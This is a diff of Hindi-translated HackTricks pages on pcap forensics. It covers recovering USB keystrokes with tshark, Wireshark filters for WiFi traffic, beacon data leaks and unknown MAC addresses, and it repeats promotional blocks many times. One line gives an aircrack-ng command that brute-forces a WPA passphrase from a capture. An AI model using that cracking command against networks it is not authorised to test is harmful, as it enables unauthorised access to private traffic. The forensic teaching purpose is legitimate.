AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,27 +1,43 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
यदि आपके पास एक USB कनेक्शन का pcap है जिसमें कई बार अवरुद्धियाँ हैं तो शायद यह एक USB कीबोर्ड कनेक्शन हो। यदि आपके पास एक USB कनेक्शन का pcap है जिसमें कई बार अंतर्रुप्तियाँ हैं तो शायद यह एक USB कीबोर्ड कनेक्शन हो।
एक वायरशार्क फ़िल्टर जैसे यह उपयोगी हो सकता है: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` एक वायरशार्क फ़िल्टर जैसे यह उपयोगी हो सकता है: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
यह महत्वपूर्ण हो सकता है कि "02" से शुरू होने वाला डेटा शिफ्ट का उपयोग करके दबाया गया है। यह महत्वपूर्ण हो सकता है कि "02" से शुरू होने वाला डेटा शिफ्ट का उपयोग करके दबाया गया है।
आप इसे विश्लेषित करने के लिए और अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी पा सकते हैं: आप इसे विश्लेषित करने के लिए अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी पा सकते हैं:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) * [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details> </details>
{% endhint %}

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
यदि आपके पास एक pcap है जिसमें एक कीबोर्ड के माध्यम से USB के माध्यम से संचार है जैसे निम्नलिखित: यदि आपके पास एक pcap है जिसमें एक कीबोर्ड के माध्यम से USB के माध्यम से संचार शामिल है जैसे निम्नलिखित:
![](<../../../.gitbook/assets/image (613).png>) ![](<../../../.gitbook/assets/image (613).png>)
@ -22,22 +23,23 @@ HackTricks का समर्थन करने के अन्य तरी
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
python3 usbkeyboard.py ./keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt
``` ```
आप इसे विश्लेषित करने के बारे में अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स यहाँ पा सकते हैं: आप इसे विश्लेषित करने के बारे में अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी यहाँ पा सकते हैं:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके**।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में **PRs** सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,49 +1,48 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
# BSSIDs की जाँच करें # BSSID जाँचें
जब आप वायरशार्क का उपयोग करके एक कैप्चर प्राप्त करते हैं जिसका मुख्य ट्रैफिक Wifi है, तो आप _Wireless --> WLAN Traffic_ के साथ कैप्चर के सभी SSID की जाँच शुरू कर सकते हैं: जब आप वायरशार्क का उपयोग करके एक कैप्चर प्राप्त करते हैं जिसका मुख्य ट्रैफिक वाईफ़ाई है, तो आप _Wireless --> WLAN Traffic_ के साथ कैप्चर के सभी एसएसआईडी की जांच शुरू कर सकते हैं:
![](<../../../.gitbook/assets/image (424).png>) ![](<../../../.gitbook/assets/image (424).png>)
![](<../../../.gitbook/assets/image (425).png>) ![](<../../../.gitbook/assets/image (425).png>)
## ब्रूट फोर्स ## ब्रूट फोर्स
उस स्क्रीन की एक कॉलम में यह दिखाता है कि **क्या कैप में कोई प्रमाणीकरण मिला है**। यदि ऐसा है तो आप `aircrack-ng` का उपयोग करके इसे Brute force करने की कोशिश कर सकते हैं: उस स्क्रीन के एक कॉलम में एक इंजेक्शन मिला है या नहीं, यह दिखाता है कि **क्या पीकैप में कोई प्रमाणीकरण मिला है**। यदि ऐसा है तो आप `aircrack-ng` का उपयोग करके इसे ब्रूट फ़ोर्स कर सकते हैं:
```bash ```bash
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
``` ```
# उदाहरण के लिए यह PSK (पूर्व साझा कुंजी) को सुरक्षित करने वाले WPA पासफ्रेज़ को पुनः प्राप्त करेगा, जो बाद में ट्रैफिक को डिक्रिप्ट करने के लिए आवश्यक होगा। # डेटा बीकन / साइड चैनल में
# बीकन्स / साइड चैनल में डेटा यदि आप संदेह कर रहे हैं कि **एक वाईफ़ाई नेटवर्क के बीकन्स में डेटा लीक हो रहा है**, तो आप नेटवर्क के बीकन्स की जांच कर सकते हैं उस नेटवर्क के बीकन्स को चेक करें जैसे निम्नलिखित फ़िल्टर का उपयोग करके: `wlan contains <NAMEofNETWORK>`, या `wlan.ssid == "NAMEofNETWORK"` शंकुलित पैकेट्स के भीतर संदेहास्पद स्ट्रिंग के लिए खोजें।
यदि आप संदेह कर रहे हैं कि **एक WiFi नेटवर्क के बीकन्स में डेटा लीक हो रहा है** तो आप नेटवर्क के बीकन्स की जांच कर सकते हैं उस फ़िल्टर का उपयोग करके जैसे: `wlan contains <NAMEofNETWORK>`, या `wlan.ssid == "NAMEofNETWORK"` आप संदेशित पैकेट्स के भीतर संदेहास्पद स्ट्रिंग के लिए खोज करें। # एक वाईफ़ाई नेटवर्क में अज्ञात MAC पते खोजें
# एक WiFi नेटवर्क में अज्ञात MAC पते खोजें निम्नलिखित लिंक उपयोगी होगा **एक वाईफ़ाई नेटवर्क के भीतर डेटा भेजने वाली मशीनें** खोजने के लिए:
निम्नलिखित लिंक उपयोगी होगा **एक WiFi नेटवर्क के अंदर डेटा भेजने वाली मशीनों को खोजने के लिए**:
* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
यदि आप **MAC पते पहले से जानते हैं तो आप उन्हें आउटपुट से हटा सकते हैं** इस जैसे चेक्स जोड़कर: `&& !(wlan.addr==5c:51:88:31:a0:3b)` यदि आप **MAC पते पहले से जानते हैं तो आप उन्हें आउटपुट से हटा सकते हैं** इस तरह की जाँच जोड़कर: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
एक बार जब आपने नेटवर्क के अंद**अज्ञात MAC पते** को पहचान लिया है जो भेजने के लिए आप **फ़िल्टर** जैसे इस जैसे उपयोग कर सकते हैं: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` इसका ट्रैफिक फ़िल्टर करने के लिए। ध्यान दें कि ftp/http/ssh/telnet फ़िल्टर उपयोगी हैं अगर आपने ट्रैफिक को डिक्रिप्ट कर लिया है। एक बार जब आपने नेटवर्क के भीत**अज्ञात MAC पते** को पहचान लिया है जो भेजने के लिए ट्रैफ़िक का उपयोग कर रहे हैं, तो आप इसका उपयोग कर सकते हैं **फ़िल्टर** जैसे निम्नलिखित: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` इसका ध्यान दें कि ftp/http/ssh/telnet फ़िल्टर उपयोगी होते हैं अगर आपने ट्रैफिक को डिक्रिप्ट कर लिया है।
# ट्रैफिक को डिक्रिप्ट करें # ट्रैफिक डिक्रिप्ट करें
संपादित करें --> वरीयताएँ --> प्रोटोकॉल --> IEEE 802.11--> संपादित संपादित करें --> वरीयताएँ --> प्रोटोकॉल --> IEEE 802.11--> संपादित

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
यहाँ आप विशेष फ़ाइल प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं: यहाँ आप विशेष फ़ाइल-प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं:
{% page-ref page=".pyc.md" %} {% page-ref page=".pyc.md" %}
@ -37,16 +38,17 @@ HackTricks का समर्थन करने के अन्य तरी
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
